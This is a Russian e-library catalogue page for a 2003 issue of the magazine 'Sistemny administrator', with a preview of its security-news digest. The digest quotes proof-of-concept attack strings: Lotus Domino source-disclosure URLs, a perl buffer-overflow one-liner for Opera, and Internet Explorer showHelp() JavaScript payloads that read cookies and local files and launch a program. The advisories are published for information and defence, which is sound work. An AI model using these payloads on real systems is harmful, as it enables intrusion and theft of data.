Национальный цифровой ресурс Руконт - межотраслевая электронная библиотека (ЭБС) на базе технологии Контекстум (всего произведений: 608419)
Контекстум
Системный администратор

Системный администратор №3 2003 (500,00 руб.)

0   0
Страниц98
ID143957
АннотацияЖурнал «Системный администратор» – ведущее российское отраслевое издание для ИТ-специалистов. Его цель – предоставление полной и объективной информации о решениях, продуктах и технологиях современной ИТ-отрасли.90% статей в журнале носят прикладной характер, снабжены примерами, таблицами, графическим материалом. Именно поэтому журнал «Системный администратор» является настольным пособием для ИТ-профессионалов и тех, кто решил делать карьеру в ИТ. Издается с октября 2002 года.
Системный администратор .— Москва : Синдикат 13 .— 2003 .— №3 .— 98 с. — URL: https://rucont.ru/efd/143957 (дата обращения: 13.03.2025)

Предпросмотр (выдержки из произведения)

№3(4) март 2003 журнал для cистемных администраторов, вебмастеров и программистов Разработчики поисковых систем отвечают на вопросы читателей Перехват системных вызовов в ОС Linux TACACS Установка FreeBSD ЛВС: управляемость и надежность оглавление Некоторые недокументированные функции Java АДМИНИСТРИРОВАНИЕ TACACS Основные принципы настройки сервера и клиента. <...> Сергей Яремчук 12 grinder@ua.fm 22 Абсолютно все о Frame Relay Что стало главным фактором высокой востребованности данной технологии? <...> Даниил Алиевский 32 daniel@siams.com Перехват системных вызовов в ОС Linux Вопросы защиты информационных систем, построенных на базе операционной системы Linux, по-прежнему актуальны. <...> Предлагаем вам рассмотреть механизм защиты, основанный на перехвате системных вызовов в ОС Linux. <...> 50 info@samag.ru HARDWARE Основы систем хранения данных IPSec через NAT: проблемы и решения Татьяна Антипова antipova@samag.ru Неужели в среде Java существуют задачи, которые не решаются с помощью стандартных библиотек и для решения которых имеет смысл прибегать к недокументированным функциям? <...> Даниил Алиевский 46 daniel@siams.com Оттолкнувшись от незыблемых законов физики и логики, постараемся приблизиться к наиболее полному пониманию дисковых систем. <...> Переполнение буфера в Opera Переполнение буфера обнаружено в веб-браузере Opera. <...> Пример: Подробности уязвимости в showhelp в IE Ранее мы сообщали о выходе патча к IE, устраняющем уязвимость в методе showHelp(). <...> Сообщается, что ограничения безопасности не работают, когда showHelp вызывается с аргументом File. <...> XMLHTTP')}\ catch(e){c=new ActiveXObject('Microsoft.XMLHTTP')};c.open('GET',\ 'file://c:/ test.txt',false);c.send(null);alert(c.responseText)"); Еще один способ чтения файла с:\text.txt: showHelp("file:");showHelp("file://c:/test.txt"); showHelp("javascript:alert(document.body.innerText)"); Запуск Winmine: showHelp("file:");showHelp("iexplore.chm");showHelp("res:"); showHelp("javascript:location='mk:@MSITStore:C:'"); showHelp("javascript:document.write('<object id=c classid=\ clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11\\u003E<param na\ me=Command value=ShortCut\\u003E\<param name=Item1 value=,\ winmine,\\u003E</object\\u003E');c.Click();"); $ perl -e "exec('opera.exe', 'http://'. <...> Уязвимость <...>
Системный_администратор_№3_2003.pdf
№3(4) март 2003 журнал для cистемных администраторов, вебмастеров и программистов Разработчики поисковых систем отвечают на вопросы читателей Перехват системных вызовов в ОС Linux TACACS TACACS Установка FreeBSD ЛВС: управляемость и надежность
Стр.1
BUGTRAQ Раскрытие исходного кода сценариев в веб-сервере Lotus Domino Уязвимость раскрытия файла обнаружена в веб-сервере Lotus Domino. Удаленный пользователь может создать специальный запрос, который раскроит содержание некоторых типов файлов. Сообщается, что удаленный пользователь может добавить точку к концу некоторых типов файлов Lotus, устанавливаемых не по умолчанию (т.е. отличных от .NSF, .NTF и т. п.), чтобы получить этот файл. Уязвимость может использоваться для просмотра исходного кода сценариев на сервере и включаемых файлов. Пример: http://[target]/reports/secretreport.csp. http://[target]/cgi-bin/myscript.pl . http://[target]/cgi-bin/runme.exe%20. http://[target]/reports/secretreport.csp%20%2E Уязвимость обнаружена в Lotus Domino Web Server 5, 6. Переполнение буфера в Opera Переполнение буфера обнаружено в веб-браузере Opera. Удаленный пользователь может сконструировать URL, который заставить браузер выполнить произвольный код при загрузке этого URL. Сообщается, что переполнение происходит при загрузке URL с чрезмерно длинным именем пользователя. Злонамеренный URL может быть передан через ссылку, изображение, фрейм, сценарий и другие методы. Пример: $ perl -e "exec('opera.exe', 'http://'. 'A' x 2624 .'@/')" Уязвимость обнаружена в Opera 6.05 build 1140, 7 beta2 build 2577. Cisco IOS может принимать поддельные ICMP Redirect-пакеты и перенаправлять их неправильному адресату Уязвимость обнаружена в операционной системе Cisco IOS. В некоторых конфигурациях маршрутизатор может принимать поддельные ICMP Redirect-пакеты. Cisco выпустил Field Notice (23074), в котором предупреждается, что если заблокирована IP-маршрутизация, маршрутизатор примет поддельный ICMP Redirect-пакет и изменит соответствующую таблицу маршрутизации. Согласно сообщению, IP-маршрутизация включена по умолчанию, так что заданные по умолчанию конфигурации неуязвимы к обнаруженной проблеме. Уязвимость может использоваться для DoS-нападений или перенаправления пакетов к другому местоположению. Уязвимость обнаружена в Cisco IOS 12.2 и более ранних версиях. Недостаток в Red Hat kernel-utils пакете Уязвимость конфигурации обнаружена в Red Hat kernelutils пакете. Локальный пользователь может выполнять привилегированные сетевые операции. Локальный пользователь может управлять некоторыми сетевыми интерфейсами, добавлять и удалять arp-входы и маршруты и помещать интерфейсы в разнородный («promiscuous») режим. Уязвимость обнаружена в Red Hat Linux 8.0. 2 Подробности уязвимости в showhelp в IE Ранее мы сообщали о выходе патча к IE, устраняющем уязвимость в методе showHelp(). Сообщается, что ограничения безопасности не работают, когда showHelp вызывается с аргументом File. Как уже говорилось, в результате атакующий может выполнять произвольный код на уязвимой системе. Вот несколько примеров. Чтение куки: showHelp("file:");showHelp("http://www.google.com/"); showHelp("javascript:alert(document.cookie)"); Чтение файла с:\text.txt: showHelp("file:");showHelp("res://shdoclc.dll/ about.dlg"); showHelp("javascript:try{c=new ActiveXObject('Msxml2.XMLHTTP')}\ catch(e){c=new ActiveXObject('Microsoft.XMLHTTP')};c.open('GET',\ 'file://c:/ test.txt',false);c.send(null);alert(c.responseText)"); Еще один способ чтения файла с:\text.txt: showHelp("file:");showHelp("file://c:/test.txt"); showHelp("javascript:alert(document.body.innerText)"); Запуск Winmine: showHelp("file:");showHelp("iexplore.chm");showHelp("res:"); showHelp("javascript:location='mk:@MSITStore:C:'"); showHelp("javascript:document.write('
Стр.4
Стр.5